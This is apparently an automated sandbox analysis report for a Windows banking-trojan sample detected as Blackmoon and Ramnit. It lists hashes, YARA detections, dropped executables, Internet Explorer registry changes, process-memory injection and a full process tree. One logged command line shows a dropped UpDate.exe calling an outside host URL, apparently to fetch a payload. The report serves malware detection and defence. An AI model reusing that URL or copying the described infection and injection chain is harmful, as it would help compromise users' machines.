blackmoon | d4872dd5974c293e0594d61291212d9868657918a0f85c34166be16e6d46f605

Analysis

max time kernel
147s
max time network
138s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01-01-2025 03:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
Size

660KB
MD5

44bc6a85155a66270e3f3519dbe25440
SHA1

1e866e797be3ae02cfced75ca11dfbdc26ead266
SHA256

d4872dd5974c293e0594d61291212d9868657918a0f85c34166be16e6d46f605
SHA512

ac22c38573d67c8ef4eea07d9bc79776386917f40b449988cdee16e39b7d1c2a583191a4201627b1deb16cb03fb9d72a77b79609b9728009a5e2651f6f73dc73
SSDEEP

12288:k16zhbcKiFyKBU/eEr3kxoj2x2P7F+WunPv1:hdbyyKymE7kydP7Y/n

Score

10^/10

blackmoon ramnit banker discovery spyware stealer trojan upx worm

Malware Config

Signatures

Blackmoon family
blackmoon
Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
trojan banker blackmoon

Detect Blackmoon payload 14 IoCs

resource	yara_rule
behavioral1/memory/2496-68-0x0000000000400000-0x00000000005BE000-memory.dmp	family_blackmoon
behavioral1/memory/2496-69-0x0000000000400000-0x00000000005BE000-memory.dmp	family_blackmoon
behavioral1/memory/2496-67-0x0000000000400000-0x00000000005BE000-memory.dmp	family_blackmoon
behavioral1/memory/2496-66-0x0000000000400000-0x00000000005BE000-memory.dmp	family_blackmoon
behavioral1/memory/2496-45-0x0000000000400000-0x00000000005BE000-memory.dmp	family_blackmoon
behavioral1/memory/2496-70-0x0000000000400000-0x00000000005BE000-memory.dmp	family_blackmoon
behavioral1/memory/2496-71-0x0000000000400000-0x00000000005BE000-memory.dmp	family_blackmoon
behavioral1/files/0x0005000000018690-79.dat	family_blackmoon
behavioral1/memory/2496-73-0x0000000000400000-0x00000000005BE000-memory.dmp	family_blackmoon
behavioral1/memory/2496-77-0x0000000000400000-0x00000000005BE000-memory.dmp	family_blackmoon
behavioral1/memory/2496-83-0x0000000000400000-0x00000000005BE000-memory.dmp	family_blackmoon
behavioral1/memory/2236-592-0x0000000000B30000-0x0000000000CEE000-memory.dmp	family_blackmoon
behavioral1/memory/2236-613-0x0000000000400000-0x00000000005BE000-memory.dmp	family_blackmoon
behavioral1/memory/2236-614-0x0000000000B30000-0x0000000000CEE000-memory.dmp	family_blackmoon

Ramnit
Ramnit is a versatile family that holds viruses, worms, and Trojans.
trojan spyware stealer worm banker ramnit
Ramnit family
ramnit

Executes dropped EXE 6 IoCs

pid	Process
2264	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
2960	DesktopLayer.exe
1104	UpDate.exe
2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
604	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
2276	DesktopLayer.exe

Loads dropped DLL 17 IoCs

pid	Process
2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2264	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
1104	UpDate.exe
1104	UpDate.exe
1104	UpDate.exe
1104	UpDate.exe
1104	UpDate.exe
2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
604	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
604	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
604	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
2276	DesktopLayer.exe
2276	DesktopLayer.exe

UPX packed file 39 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000c000000012263-5.dat	upx
behavioral1/memory/2264-9-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/2960-19-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/2960-21-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/2960-17-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/2496-38-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2960-15-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/2496-22-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-42-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-49-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-65-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-61-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-59-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-58-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-55-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-53-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-51-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-47-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-44-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-63-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-40-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-36-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-34-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-32-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-30-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-28-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-26-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-24-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2496-23-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2236-549-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2236-547-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2236-545-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2236-543-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2236-541-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2236-539-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2236-537-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2236-535-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2236-534-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral1/memory/2236-533-0x0000000010000000-0x000000001003E000-memory.dmp	upx

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft\pxC909.tmp	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
File opened for modification	C:\Program Files (x86)\Microsoft\DesktopLayer.exe	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
File opened for modification	C:\Program Files (x86)\Microsoft\px8601.tmp	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
File created	C:\Program Files (x86)\Microsoft\DesktopLayer.exe	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
File opened for modification	C:\Program Files (x86)\Microsoft\DesktopLayer.exe	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DesktopLayer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UpDate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DesktopLayer.exe

Modifies Internet Explorer settings 1 TTPs 38 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8E3C79C1-C7EC-11EF-A02E-FA59FB4FA467} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b417ce70dcf494a93235339d241249c00000000020000000000106600000001000020000000550d5d03e0218f50ffddfb676f57afd8f9f7cc187de335e4920a5f2254db379b000000000e80000000020000200000004c694cb229e69e63bd1791340cce5c6a1b4bf649c535fd724d5c759e078cece720000000698893e4bf45940e162aa01db561d55d29d991dc058ab281dfa0a2ee297c53eb40000000702953c99ac11d57aabbc9f37090400e5c734f15f37fe7ab3c88140a63aa62c07ec645e67dbafd706f077dfa1047edbb1d40a5cf72e728fd7d5d103dfe5e78fb	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "441862296"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b417ce70dcf494a93235339d241249c00000000020000000000106600000001000020000000e553520e9a556cbca80655b7cc1dfbef27b346329cd2d64a186b3f99bf14ba54000000000e800000000200002000000021b89a06e0dfda196275717b1373f33590d0fb4635b256933c48a4b73cc6134e900000007d2be27766111f77cf420e3aa69deb0d59dc9718f561fa482814403aa1e4975ceaf8e276f33825aae356a67357ca3069176f194136fd5a75bd914beadd5026e20a0e189dfc7035d840504520bcc96a2af4b5cb3417902eec34247326dad7629758cec966440bbaf383c07358d75fd13d4c8c81aa26027eda996e7b13091d740e44b6cc7c264d1ce016f31b65cdf6dd9f400000003bbc17bb1c728eb715e047f3449814faa9603c93d7bca35a5abc055ec48ed84e82a8678c6f323a6b315c748971841961aac79c2642b7eab4a3b19a6003cc1675	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20324086f95bdb01	iexplore.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2960	DesktopLayer.exe
2960	DesktopLayer.exe
2960	DesktopLayer.exe
2960	DesktopLayer.exe
2276	DesktopLayer.exe
2276	DesktopLayer.exe
2276	DesktopLayer.exe
2276	DesktopLayer.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2864	iexplore.exe
2864	iexplore.exe

Suspicious use of SetWindowsHookEx 24 IoCs

pid	Process
2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2864	iexplore.exe
2864	iexplore.exe
2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2624	IEXPLORE.EXE
2624	IEXPLORE.EXE
2624	IEXPLORE.EXE
2624	IEXPLORE.EXE
2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
2204	IEXPLORE.EXE
2204	IEXPLORE.EXE
2864	iexplore.exe
2864	iexplore.exe
2816	IEXPLORE.EXE
2816	IEXPLORE.EXE
2816	IEXPLORE.EXE
2816	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 2496 wrote to memory of 2264	2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	30
PID 2496 wrote to memory of 2264	2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	30
PID 2496 wrote to memory of 2264	2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	30
PID 2496 wrote to memory of 2264	2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	30
PID 2264 wrote to memory of 2960	2264	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe	31
PID 2264 wrote to memory of 2960	2264	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe	31
PID 2264 wrote to memory of 2960	2264	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe	31
PID 2264 wrote to memory of 2960	2264	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe	31
PID 2960 wrote to memory of 2864	2960	DesktopLayer.exe	32
PID 2960 wrote to memory of 2864	2960	DesktopLayer.exe	32
PID 2960 wrote to memory of 2864	2960	DesktopLayer.exe	32
PID 2960 wrote to memory of 2864	2960	DesktopLayer.exe	32
PID 2864 wrote to memory of 2624	2864	iexplore.exe	33
PID 2864 wrote to memory of 2624	2864	iexplore.exe	33
PID 2864 wrote to memory of 2624	2864	iexplore.exe	33
PID 2864 wrote to memory of 2624	2864	iexplore.exe	33
PID 2496 wrote to memory of 1104	2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	34
PID 2496 wrote to memory of 1104	2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	34
PID 2496 wrote to memory of 1104	2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	34
PID 2496 wrote to memory of 1104	2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	34
PID 2496 wrote to memory of 1104	2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	34
PID 2496 wrote to memory of 1104	2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	34
PID 2496 wrote to memory of 1104	2496	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	34
PID 1104 wrote to memory of 2236	1104	UpDate.exe	36
PID 1104 wrote to memory of 2236	1104	UpDate.exe	36
PID 1104 wrote to memory of 2236	1104	UpDate.exe	36
PID 1104 wrote to memory of 2236	1104	UpDate.exe	36
PID 1104 wrote to memory of 2236	1104	UpDate.exe	36
PID 1104 wrote to memory of 2236	1104	UpDate.exe	36
PID 1104 wrote to memory of 2236	1104	UpDate.exe	36
PID 2236 wrote to memory of 604	2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	37
PID 2236 wrote to memory of 604	2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	37
PID 2236 wrote to memory of 604	2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	37
PID 2236 wrote to memory of 604	2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	37
PID 2236 wrote to memory of 604	2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	37
PID 2236 wrote to memory of 604	2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	37
PID 2236 wrote to memory of 604	2236	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe	37
PID 2864 wrote to memory of 2204	2864	iexplore.exe	38
PID 2864 wrote to memory of 2204	2864	iexplore.exe	38
PID 2864 wrote to memory of 2204	2864	iexplore.exe	38
PID 2864 wrote to memory of 2204	2864	iexplore.exe	38
PID 604 wrote to memory of 2276	604	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe	39
PID 604 wrote to memory of 2276	604	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe	39
PID 604 wrote to memory of 2276	604	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe	39
PID 604 wrote to memory of 2276	604	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe	39
PID 604 wrote to memory of 2276	604	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe	39
PID 604 wrote to memory of 2276	604	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe	39
PID 604 wrote to memory of 2276	604	JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe	39
PID 2276 wrote to memory of 3028	2276	DesktopLayer.exe	40
PID 2276 wrote to memory of 3028	2276	DesktopLayer.exe	40
PID 2276 wrote to memory of 3028	2276	DesktopLayer.exe	40
PID 2276 wrote to memory of 3028	2276	DesktopLayer.exe	40
PID 2864 wrote to memory of 2816	2864	iexplore.exe	41
PID 2864 wrote to memory of 2816	2864	iexplore.exe	41
PID 2864 wrote to memory of 2816	2864	iexplore.exe	41
PID 2864 wrote to memory of 2816	2864	iexplore.exe	41

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2496
- C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
  C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2264
- - C:\Program Files (x86)\Microsoft\DesktopLayer.exe
    "C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2960
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe"
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2864
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2864 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2624
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2864 CREDAT:209933 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2204
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2864 CREDAT:5977093 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2816
- C:\Users\Admin\AppData\Local\Temp\data\UpDate.exe
  C:\Users\Admin\AppData\Local\Temp\data\UpDate.exe 3.0 %43%3A%5C%55%73%65%72%73%5C%41%64%6D%69%6E%5C%41%70%70%44%61%74%61%5C%4C%6F%63%61%6C%5C%54%65%6D%70%5C%4A%61%66%66%61%43%61%6B%65%73%31%31%38%5F%34%34%62%63%36%61%38%35%31%35%35%61%36%36%32%37%30%65%33%66%33%35%31%39%64%62%65%32%35%34%34%30%2E%65%78%65 ¼Ù http://www.gutou.cc/up/shiyimiaozan.txt
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1104
- - C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe
    C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440.exe ÃüÁîÆô¶¯
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2236
  - - C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
      C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_44bc6a85155a66270e3f3519dbe25440Srv.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:604
    - - C:\Program Files (x86)\Microsoft\DesktopLayer.exe
        
        "C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2276
      - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        6⤵
        
        PID:3028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

Filesize
252B

MD5
f26a1db5877ca5daffccacd732285f8d

